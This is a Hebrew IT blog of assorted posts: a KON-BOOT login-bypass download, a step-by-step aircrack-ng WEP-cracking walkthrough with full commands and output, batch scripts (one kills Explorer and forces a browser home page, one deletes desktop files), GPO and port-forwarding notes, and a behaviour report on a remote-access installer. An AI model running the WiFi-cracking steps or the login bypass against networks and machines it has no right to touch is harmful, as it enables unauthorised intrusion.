יום חמישי, 11 בדצמבר 2014

KON BOOT מתאים גם לווינדוס 7 - 8 - 10 + UEFI

הורדה ישירה

צריבה על USB באמצעות התוכנה המצורפת:


WIFI פריצה

לפריצת רשתות יש צורך במערכת לינוקס לא ניתן לבצע זאת במערכת חלונות windows 

לשם כן תצטרך את חבילת התוכנות של http://www.AirCrack-ng.org

לפני הכל בדוק כי ערכת השבבים (הציפסט) של הכרטיס רשת תומך בכך בהתאם לסוגים המופיעים ברשימת התואמים באתר התוכנה http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

במידה וכן התקן את כל התוכנות הבאות לפי יעודם 

בשביל להחליף את הכרטיס רשת ממצב כרטיס רשת למצב מוניטור airmon-ng
בשביל למצוא רשתות אלחוטיות ותפיסת חבילות airodump-ng
בשביל הזרקת .ivs aireplay-ng
בשביל למצוא את הסיסמא aircrack-ng


---

עוד הסבר-


הפריצה אפשרית כאשר מישהו אחר גולש ברשת שאתה רוצה לפרוץ
צריך 3 טרמינלים פתוחים
טרמינל 1



airmon-ng start wlan0 מעביר למצב מוניטור
airodump-ng mon0 מציג רשתות בסביבה
צריך להעתיק משם 3 דברים
1. המספר של הרשת האלחוטית שנקרא bssid
2. מס' הערוץ ch
3. המק של מי שגולש באותה הרשת station (נמצא למטה באמצע השורה ולידו משמאל יש את המספר של הרשת bssid)
airodump-ng --ivs -c מספר הערוץ --bssid מספר הרשת -w תתקע שם לקובץ mon0  מתחיל לאסוף נתונים של הרשת לתוך קובץ


טרמינל 2
aireplay-ng --arpreplay -b מספר הרשת -h המק של הגולש האנונימי mon0 שולח פקטים לרשת

טרמינל 3

aircrack-ng -b        שם הקובץ      מספר הרשת
תבדוק מה שם הקובץ. אם בחרת למשל A אז שם הקובץ הוא A-01.IVS

מדריך נוסף מ http://linmagazine.co.il/node/view/49771#.VInsAVWsUlW

ב. הדגמת פיצוח קוד של רשת אלחוטית
פעלתי לפי המדריך. כדי לשמור את הבדיקה הזאת במסגרת החוק פיצחתי את הקוד של הרשת שלי עצמי, שהוגנה בשיטת הקידוד wep ובמפתח הקסהדצימאלי של 64 ביט.

השתמשתי בנוהל הבא:

1. איפיון כרטיס האלחוט.

זה נעשה על ידי הפקודה airmon-ng :

root@bt:~# airmon-ng
Interface       Chipset         Driver
wlan0           Ralink RT2870/3070      rt2800usb – [phy0]


הערה: יתכן והכרטיס שלכם יזכה לכינוי שונה, למשל ra0. בכל הפקודות שיופיעו להלן החליפו wlan0 בכינוי הכרטיס שלכם.

2. השבתת כרטיס האלחוט

זה שלב חיוני, כי אם הכרטיס נעול על רשת מסויימת נקבל הודעות שגיאה לרוב - והמזימה שלנו לא תצא לפועל. שלב זה מתבצע על ידי הרצת הפקודות airmon-ng stop wlan0 ו ifconfig wlan0 down בזו אחר זו.

root@bt:~# airmon-ng stop wlan0
Interface       Chipset         Driver
wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                                (monitor mode disabled)
root@bt:~# ifconfig wlan0 down


3. איתחול של המוניטור.

הפקודה היא: airmon-ng start wlan0 בשלב זה נוספת תכונה חדשה לכרטיס האלחוט: מוניטור. אצלי הוא כונה mon0 – אצלכם הוא יכול לזכות בכינוי אחר – השתמשו בו.

root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                                (monitor mode enabled on mon0)


4. זיהוי כתובת ה MAC של mon0. הפקודה היא ifconfig -a:

root@bt:~# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:0c:29:e7:66:8f
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

mon0      Link encap:UNSPEC  HWaddr 00-1C-DF-68-DD-22-00-00-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:338 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:43180 (43.1 KB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 00:1c:df:68:dd:22
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


והכתובת היא 00:1C:DF:68:DD:22. מן הראוי להזהיר כאן כי כתובת זו תרשם בלוגים של נקודת הגישה אותה מנסים לפרוץ, ותסגיר את אלו העושים זאת.

5. “ריחרוח" של הרשתות בסביבה. הפקודה היא: airodump-ng mon0:

root@bt:~# airodump-ng mon0


 CH  7 ][ Elapsed: 32 s ][ 2011-01-31 08:03

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:14:D1:6E:8F:A2   79        3        0    0  13  54e  WEP  WEP         milner1
 00:14:D1:C2:F9:33   78        5        0    0   9  54 . OPN              TRENDnet
 00:25:9C:43:DD:67   77        5        0    0   6  54e  WPA  TKIP   PSK
 00:1D:7E:55:94:97   76       17        2    0  11  54   WEP  WEP         linksys
 5C:D9:98:C7:24:CC   73       17        0    0   6  54   WEP  WEP         SANSONE
 00:1B:9E:89:C3:85   73       17        0    0   6  54e  WEP  WEP         milner
 00:19:5B:78:FC:42   68       10        1    0   6  54e. WEP  WEP         lulisa
 00:21:63:4D:A7:14   66       18        0    0   1  54e  WEP  WEP         gur
 D8:5D:4C:CA:9D:A7   65       16        0    0   5  54e. WPA2 CCMP   PSK  pollak hot
 00:14:D1:C6:BD:31   64       16        0    0   4  54e  WPA2 CCMP   PSK  lulis1
 F0:7D:68:5E:FB:F8   43       24        2    0   2  54e. WEP  WEP         linux
 00:11:50:29:94:EF   36       30        0    0   3  54   WEP  WEP         lulibz

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 (not associated)   00:14:D1:C6:BD:31   62    0 - 1      0        1  lulis1
 (not associated)   00:24:23:07:CE:83   48    0 - 1      0        9  lulis


בכל שורה מופיע הספק השידור (תחת P). היחידות הן dbm- (לוגריתמיות), ולכן ככל שהערך נמוך יותר התחנה חזקה יותר. תחת CH מופיע מספר הערוץ. תחת ENC מופיע סוג הקידוד, ותחת ESSID כינוי התחנה. העמודה השמאלית ביותר, BSSID מפרטת את ה MAC של נקודת הגישה.

אנו רואים ש lulibz היא התחנה החזקה ביותר; כתובת ה MAC שלה היא 00:11:50:29:94:EF , היא משדרת על ערוץ 3 בקידוד wep. היא תהיה "הקרבן" שלנו בתרגיל זה.

נפסיק עכשיו את ביצוע הפקודה הנ"ל על ידי הקלדת ctl+c.

6. אכיפת התקשרות בינינו לבין התחנה המותקפת (lulibz).

הפקודה (בדוגמה שלנו) היא aireplay-ng -1 0 -a 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 -e lulibz mon0 והפלט שלה הוא:

oot@bt:~# aireplay-ng -1 0 -a 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 -e lulibz mon0
08:07:50  Waiting for beacon frame (BSSID: 00:11:00:00:00:00) on channel 3

08:07:50  Sending Authentication Request (Open System) [ACK]
08:07:50  Authentication successful
08:07:50  Sending Association Request

08:07:55  Sending Authentication Request (Open System) [ACK]
08:07:55  Authentication successful
08:07:55  Sending Association Request

08:08:00  Sending Authentication Request (Open System) [ACK]
08:08:00  Authentication successful
08:08:00  Sending Association Request

08:08:05  Sending Authentication Request (Open System) [ACK]
08:08:05  Authentication successful
08:08:05  Sending Association Request [ACK]
08:08:05  Association successful :-) (AID: 1)


הופעת ה"סמיילי" בשורה האחרונה היא תנאי להמשך...

7. איסוף data המוחלפת בין נקודת-הגישה (lulibz בדוגמה) ולקוח כלשהו שלה. האיסוף יתבצע לתוך קובץ (הנשמר על שולחן העבודה של bt4) עם הסיומת cap. . מה קל מאשר לקרוא לו בשם התחנה – lulibz?

הפקודה היא: airodump-ng -c 3 -w lulibz --bssid 00:11:50:29:94:EF mon0
והפלט שלה:

root@bt:~# airodump-ng -c 3 -w lulibz --bssid 00:11:50:29:94:EF mon0

 CH  3 ][ Elapsed: 44 mins ][ 2011-01-23 15:48

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:50:29:94:EF   26 100    26150    15840    0   3  54   WEP  WEP    OPN  lulibz

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:11:50:29:94:EF  00:26:4D:F0:E4:E9   46   54 - 1      0    17749  lulibz


ערך ה DATA עולה בהדרגה, בתלות במרחק שלנו מנקודת הגישה המותקפת, ובכמות המידע המוחלף בינה לבין לקוחותיה. כדי לפצח קוד wep בן 64 ביט זקוקים למינימום 10000 נקודות DATA ולקוד בן 128 זקוקים לכ 50000. אם אין תעבורה, הערך של DATA (שהוא 15840 בדוגמה) יעלה בצורה איטית ביותר, בעוד שהקובץ lulibz-01.cap ימשיך לתפוח בצורה פראית, עד שימלא את כל הכונן הקשיח. לכן, אם אין תעבורה - עלינו לאלץ אותה. 
לשם כך יש לפתוח קונסול חדש (תוך שמניחים לקודם להמשיך לרוץ).


8. אילוץ תעבורה לנקודת הגישה המותקפת.

הפקודה היא: aireplay-ng -3 -b 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 mon0
ופלט אופייני נראה כך:
root@bt:~# aireplay-ng -3 -b 00:11:50:29:94:EF -h 00:1C:DF:68:DD:22 mon0
08:09:51  Waiting for beacon frame (BSSID: 00:11:50:29:94:EF) on channel 3
Saving ARP requests in replay_arp-0131-080951.cap
You should also start airodump-ng to capture replies.

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
^Cad 9762247 packets (got 20 ARP requests and 4582797 ACKs), sent 4917910 packets...(2401 pps)


במשך זמן-מה תחזור ההודעה האומרת שלא נוצר קשר, אבל לפתע הוא יווצר. ברגע זה נראה שה DATA בקונסול הקודם מתחילה לדהור.

9. פיצוח.

גם זה נערך בקונסול חדש, שלישי, עם הפקודה:
aircrack-ng -n 64 -b 00:11:50:29:94:EF lulibz1-01.cap

והפלט הוא:

root@bt:~# aircrack-ng -n 64 -b 00:11:00:00:00:00 lulibz-01.cap
Opening lulibz-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40163 ivs.


                                 Aircrack-ng 1.1 r1738


                 [00:00:02] Tested 6 keys (got 40163 IVs)

   KB    depth   byte(vote)
    0    0/  1   44(59392) 3A(48128) FC(47360) 13(47104) 9E(47104)
    1    0/  5   DD(50944) 6B(49664) 58(49408) 40(48384) 86(48128)
    2    0/  1   39(53248) 73(48384) AD(48128) 00(47872) 93(47616)
    3    0/  1   16(55808) 6D(48384) 1B(47872) 59(47872) DD(47872)
    4    0/  1   46(57856) 62(48128) 41(47616) DC(47104) AE(46592)

                     KEY FOUND! [ 11:22:33:44:55 ]
        Decrypted correctly: 100%


בידים מיומנות, וקרוב מספיק לנקודת הגישה, נמשך התהליך פחות מחמש דקות!

מסקנה: קידוד זה חלש מדי, בעליל. ובימינו, כשכל-כך הרבה מידע אישי רגיש עובר ברשת – אל תקחו אותו הביתה - for love or money.

יום ראשון, 30 בנובמבר 2014

סקריפט למחיקת קוקיס היסטוריה ועוד









הגדרת מחשב כנקודת גישה (Access Point)

netsh wlan set hostednetwork mode=allow ssid=VirtualRouter key=123456789

netsh wlan start hostednetwork

netsh wlan stop hostednetwork

על מנת לבחון את הפרטים של הרשת האלחוטית הווירטואלית, יש להריץ את הפקודה:

netsh wlan show hostednetwork

על מנת לשנות את סיסמת ה-WPA2 של הרשת יש להריץ את הפקודה:

netsh wlan refresh hostednetwork YourNewNetworkPassword

על מנת למחוק כליל את הגדרת הרשת האלחוטית הווירטואלית, יש להריץ את הפקודה:

netsh wlan set hostednetwork mode=disallow

יום חמישי, 27 בנובמבר 2014

סקריפטים

סקריפט זה נועד לסגור למשתמש את שולחן העבודה לקבוע את דף הבית ולפתוח את דף הבית

TASKKILL /F /IM EXPLORER.exe

Reg.exe add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://the-saudi-hacker.blogspot.co.il/" /f

start iexplore.exe

Exit



סקריפט ליצירת קובצי קיצור דרך url בשולחן העבודה

echo [InternetShortcut] >"%userprofile%\desktop\loogle.url"
echo URL=http://www.loogle.com/ >>"%userprofile%\desktop\loogle.url"
echo IconFile="F:\Icons\loogle.ico"  >>"%userprofile%\desktop\loogle.url"
echo IconIndex=0 >>"%userprofile%\desktop\loogle.url"

סקריפט למחיקת תוכן שולחן עבודה
סקריפט למחיקת כל תוכן שולן העבודה חוץ מקיצורי דרך *.ink באמצעות כתיבת תנאי

@Echo OFF
For %%# in (
    "%USERPROFILE%\Desktop\*"
) Do (
    If /I not "%%~x#" EQU ".lnk" (
     Del /Q "%%#"
    )
)
Pause&Exit

סקריפט לחיבור כוננים משותפים בביצוע Login

cd\
net use * /delete /y
net use z: "\\sano\Settings$"
net use Y: "\\server1\Documents$"
Label z: "soft"
Label Y: "doc"
exit

או

cd\
net use * /delete /y
net use z: "\\sano\Settings$"
net use Y: "\\server1\Documents$"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\##sano#Settings$" /t REG_SZ /v "_LabelFromDesktopINI" /d "soft" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\##sano#Documents$" /t REG_SZ /v "_LabelFromDesktopINI" /d "doct" /f
exit

סקריפט לכיבוי המחשב באמצעות מתזמן משימות

cd\
Shutdown /s /t 60 /f /c "Goodnight... Go to bed !!!!!!"

cd\
schtasks /Create /tn shotdown /sc daily  /st 23:00 /tr "%windir%\system32\Shutdown /s /f"
exit

@echo off
 :W
if %time%==00:00:00.00 goto :X
goto :W
 :X
shutdown.exe /s /f /t 60 /c "Go to bed!!!!!!"


סקריפט עם תו מוליך


יום שני, 24 בנובמבר 2014

PORT פורטים שצריכים להיות פתוחים בשרת


GPO

הגדרות חשובות ב GPO

ביטול שורת פקודה-



המדיניות אינה מאפשרת להיכנס למערכת באופן אינטראקטיבי





בחלון המוצג בתיבת הדו שיח צריכים להופיע המשתמשים המאושרים לכניסה באופן מקומי. כדי להוסיף משמשים לרשימת בעלי הרשאת גישה לכניסה מקומית לחץ על כפתור הוספת משתמש או קבוצה... - Add User or Group..
הוסף את המשמשים או הקבוצות הרצויות בהתאם לדרישות המערכת (מקומית או חבר בבקר תחום):

מנהל המערכת, או קבוצת המנהלים Administrator
כל אחד Everyone
קבוצת משמשים בבקר שם תחום Domain Users
לסיום לחץ על אישור. (במידה ותרצה להסיר קבוצה או משתמש סמן בדאבל קליק ולחץ על כפתור הסר – Remove)

אפשר כניסה באמצעות שירותי מסוף - Allow Log on through Terminal Services


07.png

קביעת זמן ריענון של הגדרות ה GPO למשתמש קצה




יום שבת, 15 בנובמבר 2014

Port Forwarding

Port Forwarding

העברת שערים (בלע"ז port forwarding), המכונה לעתים "תיעול", היא פעולת ההעברה של פורט ממכונה אחת לאחרת. דרך אחת לניצול שיטה זו היא לצורך גישה למכונה ברשת פרטית דרך מחשב מחוץ לרשת הזו.
הדבר מאפשר למחשבים מרוחקים, אשר מחוברים לרשת האינטרנט למשל, להתחבר למכונה מסוימת המחוברת לרשת פרטית, שאינה נגישה בדרכים רגילות.
לדוגמה:
השיטה נפוצה גם כאשר יש צורך בגישה למחשב אשר מחובר רק לרשת פנימית. אז משתמשים במחשב מתווך המחובר גם לרשת הפנימית וגם לזו לחיצונית, אשר מעביר את התקשורת בין הצדדים. בדרך כלל התקשורת הזו מתבצעת בפרוטוקול המוצפן SSH.

DNS 2 + FTP

DMZ-

אזור מפורז -  Demilitarized zone  









יש 3 חברות שמציעות פתרון לצורך לרכוש IP קבוע [לדוגמה בשביל מצלמות אבטחה]
השירות בנוי באופן ש IP הזמני מסתנכרן עם החשבון שלכם, וזה מעדכן ב DNS את IP מול הדומיין
השירות מאד פופולרי ולכן הוא מובנה כבר בראוטר תחת השירות של DNS דינמי

לדוגמא .noip.com 

FTP

ווינדוס משתמש בפרוטקול  SMB בפורט: 137  138  139  445

לינקוס עובד עם FTP בפורט  21  20

יש שרת סמבה שממיר ומתווך בין הפלטפורמות

בתכלס, גם בווינדוס צריך FTP

שרת IIS זה רכיב שמגיע עם כל ווינדוס , אבל אותו א''א להסיר כי הוא בגרעין המערכת

IIS או Internet Information Services הוא ערכה של כלים מבוססי אינטרנט עבור שרתים שרצים בסביבת Windows. זהו שרת האינטרנט השני הפופולרי בעולם אחרי Apache HTTP Server. השרתים שכרגע נכללים בערכה הם: FTP,‏ SMTP,‏ NNTP ו-HTTP/HTTPS.


גרסאות








מומלץ להעביר את מיקום התיקייה של FTP מכונן המערכת לכונן אחר

2013-08-28_044221.png












יום שישי, 14 בנובמבר 2014

נתיב

System Changes
Some path values have been replaced with environment variables as the exact location may vary with different configurations.
e.g.
%WINDIR% = \WINDOWS (Windows 9x/ME/XP/Vista/7), \WINNT (Windows NT/2000)
%PROGRAMFILES% = \Program Files

The following files were analyzed:
85da022b0171b2072867e95c6752b662.exe
The following files have been added to the system:
  • %TEMP%\TeamViewer\Version7\tvinfo.ini
  • %PROGRAMFILES%\symen\enativ\apps\STV.exe
  • %TEMP%\TeamViewer\Version7\tv_w32.dll
  • %PROGRAMFILES%\symen\enativ\update.log
  • %TEMP%\TeamViewer\Version7\x86\TVMonitor.inf
  • %TEMP%\TeamViewer\Version7\tv_x64.dll
  • %TEMP%\TeamViewer\Version7\TeamViewer_StaticRes.dll
  • %TEMP%autoupdate.exe.new
  • %TEMP%\7ZipSfx.000\dsfVorbisDecoder.dll
  • %TEMP%\7ZipSfx.000\config.txt
  • %TEMP%\TeamViewer\Version7\TeamViewer_Service.exe
  • %TEMP%\7ZipSfx.000\branding.ini
  • %TEMP%\7ZipSfx.000\vp8encoder.dll
  • %PROGRAMFILES%\symen\enativ\autoupdate.exe
  • %TEMP%\TeamViewer\Version7\x86\tvmonitor.cat
  • %TEMP%\STV.exe.new
  • %TEMP%\7ZipSfx.000\install.cmd
  • %TEMP%\7ZipSfx.000\Hebrew.lg
  • %TEMP%\TeamViewer\Version7\TeamViewer_Desktop.exe
  • %TEMP%\7ZipSfx.000\RWLN.dll
  • %TEMP%\7ZipSfx.000\dsfVorbisEncoder.dll
  • %TEMP%\7ZipSfx.000\msvcr90.dll
  • %TEMP%\7ZipSfx.000\Microsoft.VC90.CRT.manifest
  • %TEMP%\TeamViewer\Version7\TeamViewer.exe
  • %TEMP%\7ZipSfx.000\rfusclient.exe
  • %PROGRAMFILES%\symen\enativ\apps\QAgent.exe
  • %TEMP%\nslE.tmp
  • %TEMP%\7ZipSfx.000\RIPCServer.dll
  • %TEMP%\7ZipSfx.000\settings.dat
  • %TEMP%\7ZipSfx.000\gdiplus.dll
  • %TEMP%\TeamViewer\Version7\TeamViewer.ini
  • %TEMP%\7ZipSfx.000\msvcp90.dll
  • %TEMP%\7ZipSfx.000\logo.png
  • %TEMP%\TeamViewer\Version7\x86\TVMonitor.sy_
  • %TEMP%\7ZipSfx.000\Logs\rms_log_2012-07.html
  • %PROGRAMFILES%\symen\enativ\apps\RemoteNativ.exe
  • %TEMP%\TeamViewer\Version7\tv_x64.exe
  • %TEMP%\TeamViewer\Version7\tv_w32.exe
  • %TEMP%\7ZipSfx.000\vp8decoder.dll
  • %TEMP%\TeamViewer\Version7\TeamViewer_Resource_en.dll
  • %TEMP%\7ZipSfx.000\English.lg
  • %TEMP%\7ZipSfx.000\rutserv.exe
  • %TEMP%\7ZipSfx.000\EULA.rtf
  • %ALLUSERSPROFILE%\Desktop\ .lnk
The following files were temporarily written to disk then later removed:
  • %TEMP%\TeamViewer\Version7\tvqsfiles.7z
  • %TEMP%\nsgF.tmp\System.dll
  • %TEMP%\nsgF.tmp\ReadCustomerData.dll
  • %TEMP%\nsgF.tmp\nsis7z.dll
  • %TEMP%\sd.bat
  • %TEMP%\nsgF.tmp
  • %TEMP%\TeamViewer\Version7\tvqsfilesx86.7z
  • %TEMP%\nsvD.tmp
  • %TEMP%\TeamViewer\Version7\TeamViewer98.ini
  • %TEMP%\nsgF.tmp\TvGetVersion.dll
  • %TEMP%\TeamViewer\Version7\custom.7z
The following registry elements have been created:
  • HKEY_CURRENT_USER\SOFTWARE\ENATIV\
  • HKEY_CURRENT_USER\SOFTWARE\ENATIV\STV\
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\
The following registry elements have been changed:
  • HKEY_CURRENT_USER\SOFTWARE\ENATIV\STV\TEMPFULLPATH
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\CALENDARRECORDSETTINGS = [binary data]
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\CALLBACKSETTINGS = FF-FE
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\FUSCLIENTPATH = %TEMP%\7ZipSfx.000\rfusclient.exe
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\NOTIFICATION = [binary data]
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\OPTIONS = [binary data]
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\PASSWORD = DB5B36CED7624D82EE0DD85374A3390D198638503D80DC16BECFB8CB284B3709E020B14CE61DBE0990647C99B6BA34FCA8F3027CF528351FC5B6A59C19048A04
  • HKEY_CURRENT_USER\SOFTWARE\USORIS\REMOTE UTILITIES\SERVER\PARAMETERS\USERACCESS
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet\CONTROL\SESSION MANAGER\PENDINGFILERENAMEOPERATIONS = \??\%TEMP%\nsgF.tmp\
The applications attempted the following network connection(s):
  • 62.219.23.***:80
  • 72.55.184.***:5655
  • hxxp://www.enativ.com/downloads/*****